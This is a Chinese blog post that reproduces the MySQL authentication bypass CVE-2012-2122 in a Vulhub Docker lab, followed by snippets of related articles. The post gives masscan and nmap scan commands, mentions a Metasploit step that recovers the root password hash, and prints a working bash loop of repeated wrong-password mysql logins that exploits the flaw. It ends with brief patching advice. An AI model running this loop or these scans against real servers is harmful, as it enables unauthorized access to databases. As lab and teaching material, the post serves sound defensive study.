Mysql身份认证绕过漏洞(CVE-2012-2122)复现

最新推荐文章于 2023-11-30 10:57:38 发布
最新推荐文章于 2023-11-30 10:57:38 发布
阅读量147 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: mysql 网络安全 linux Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51641247/article/details/129484437
版权

1.漏洞描述

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

2.影响版本

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 .

  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 .

3.环境部署

kali :192.168.249.130

ubantu ip:192.168.249.137

搭建环境:

https://vulhub.org/#/environments/mysql/CVE-2012-2122/

启动环境 docker-compose up -d

4.漏洞复现(两种方式)

1.使用nmap扫描

  1. 使用nmap 对靶机进行扫描,查看所开放的端口,以及扫描数据库的版本信息

masscan --rate=10000 --ports 0-65535 192.168.249.137
nmap -T4 -sV -O -p 3306 192.168.249.137

扫描结果为:开启3306端口,并且mysql版本为5.5.23

  1. 配置msf参数

我们可以看到MD5加密的root用户密码

使用md5解密,密码为123456

  1. 远程连接mysql数据库

mysql -h 192.168.249.137 -u root -p123456

2.执行脚本

  1. 进入终端执行命令

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.249.137 -P3306 ; done

经过漫长的等待......终于进入数据库

漏洞修复

  1. 对数据库进行升级打补丁

  1. 关闭mysql端口

-飞飞鱼
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
KaliLinux-nmap(众神之眼)高级应用-IDS与防火墙规避及漏洞利用脚本篇
易编橙 · 终身成长社群,相遇已是上上签!
03-31 2775
文章目录IDS与防火墙规避篇NSE脚本篇常用的脚本攻击案例扫描服务器常见的漏洞检查FTP是否存在匿名登陆利用DNS进行子域名暴力破解对MySQL进行暴力破解对MsSQL进行暴力破解对Oracle进行暴力破解对SSH进行暴力破解修改Nmap默认的UserAgentHTTP管道 IDS与防火墙规避篇 在实际应用场景中,Nmap提供了多种规避技巧用于IDS和防火墙的检测和屏蔽 下面是一些常用的规避方式 命令参数 参数详解 -f 将发送的检测数据包以分片碎片化的方式进行传输,用以规避IDS和防火
nmap的高级使用-参数,脚本,绕过防火墙
weixin_46626737的博客
07-11 658
-script http-methods --script-args http.useragent=”Mozilla 5” 修改user-agent字段。--script-trace --script=vuln/.... 来查看发送的数据包。--script=http-methods 扫描http允许的方法。--script-help=dos 查看dos脚本的帮助文档。--script=http-brute http认证爆破。--script=http-ls 扫描http目录。
nmap mysql爆破_关于Nmap的简单爆破
weixin_42316909的博客
02-06 1705
首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:nmap 192.168.30.128可以看到,目标服务器开放了众多的服务端口!下面我们来对其 SMB 服务进行一个简单爆破:nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128可以看到用户名...
实训实训实训
IWANnaaa的博客
04-03 4735
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.1...
Mysql 身份认证绕过漏洞CVE-2012-2122
NLXHBM的博客
04-24 2918
漏洞原理:当连接 MariaDB / MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说,只要知道用户名,不断尝试就能够直接登入 SQL 数据库。 修复:对数据库进行升级打补丁;在防火墙上关闭mysql端口 1.环境搭建 使用nmap扫描 使用nmap 对靶机进行扫描,查看所开放的端口,以及扫描数据库的版本信息 masscan --rate=10000 --ports 0-...
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5517
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
渗透之——Nmap+Zenmap+Amap+Zmap
热门推荐
冰河的专栏
11-18 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84204992 Nmap 第一部分 Nmap基础 一、Nmap功能 基本功能有三个:     1.探测主机是否在线;     2.扫描主机端口,嗅探所提供的网络服务     3.推断主机操作系统      主机探测:     探测网路上的主机,例如列出相应TCP和ICMP请求,i...
常用的渗透测试工具(含安装教程&使用方法)
MachineGunJoe666
10-25 284
SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。SQLMap采用了以下5种独特的SQL注入技术。● 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
信息漏洞分析
qq_44790964的博客
09-23 350
常见的漏洞分析工具. NMAP AWVS Appscan Burpsuite Netsparker Jsky Safe3wvs 椰树 M7Lrv NMAP 端口扫描之王 NMAP (nmap有绕过防火墙的功能) 主机探测 扫描单个主机 nmap 192.168.1.2 扫描整个子网,命令如下: nmap 192.168.1.1/24 扫描多个目录,命令如下: nmap 192.168.1.2 ...
sqlmap的使用详解(三:绕过防火墙)
→_→
10-11 2061
目录 0x01 确认WAF 0x02 使用参数进行绕过 0x03 使用脚本介绍 1 使用格式: 2 脚本总类 0x04脚本参数组合策略绕过 1 mysql绕过: 2 MSSQL: 3 ms access: 4Oracle: 5 建议: 0x01 确认WAF 首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我...
WAF的识别、检测、绕过原理与实战案例
最新发布
2301_81250923的博客
11-30 1263
WAF通过配置DNS解析地址、软件部署、串联部署、透明部署、网桥部署、反向代理部署、旁路部署等获取攻击流量,基于规则进行攻击特征匹配,或利用其他方式进行攻击检测及阻断。
绕过防火墙爆破mysql_SQL注入绕过防火墙的9种基本方法
weixin_32431435的博客
02-03 656
Web应用程序防火墙(WAF)的主要作用是过滤,监控和阻止各类进出Web应用程序的HTTP流量。WAF区别于常规防火墙,因为WAF能够过滤特定Web应用程序的内容,而常规防火墙充当的则是服务器之间的安全门。通过检查HTTP流量,它可以防止源自Web应用安全漏洞的攻击,如SQL注入,XSS,文件包含和安全配置错误。WAF是如何工作的?协议异常检测:拒绝不符合HTTP标准的请求增强的输入验证:代理和服...
Web安全攻防渗透测试实战指南之Nmap工具使用
05-29 1601
Nmap脚本位置:/usr/share/nmap/scripts/Nmap脚本类别:Auth:负责处理鉴权证书(绕过鉴权)的脚本Broadcast:在局域网内探查更多服务的开启情况,如DHCP/DNS/SQLServer等Brute:针对常见的应用提供暴力破解方式,如HTTP/SMTP等Default:使用-sC或-A选项扫描时默认的脚本,提供基本的脚本扫描能力Discovery:对网络进行更多信息的收集,如SMB枚举、SNMP查询等Dos:用于拒绝服务攻击。
NTP 身份验证绕过漏洞(CVE-2015-7871)
05-09
NTP是网络时间协议,用于同步计算机的时钟。CVE-2015-7871是NTP中的一个身份验证绕过漏洞,攻击者可以利用该漏洞来实现远程攻击并控制目标机器。 该漏洞的原因是NTP在处理某些特殊的数据包时会发生缓冲区溢出,导致攻击者可以通过发送精心构造的数据包来触发该漏洞。攻击者可以通过该漏洞来伪造NTP服务器并向目标机器发送虚假的时间戳,从而影响目标机器的时间同步,甚至导致拒绝服务攻击。 NTP官方已经发布了补丁来修复该漏洞,建议用户及时更新NTP软件版本以避免受到攻击。此外,还应加强网络安全防护措施,限制外部网络对NTP服务的访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值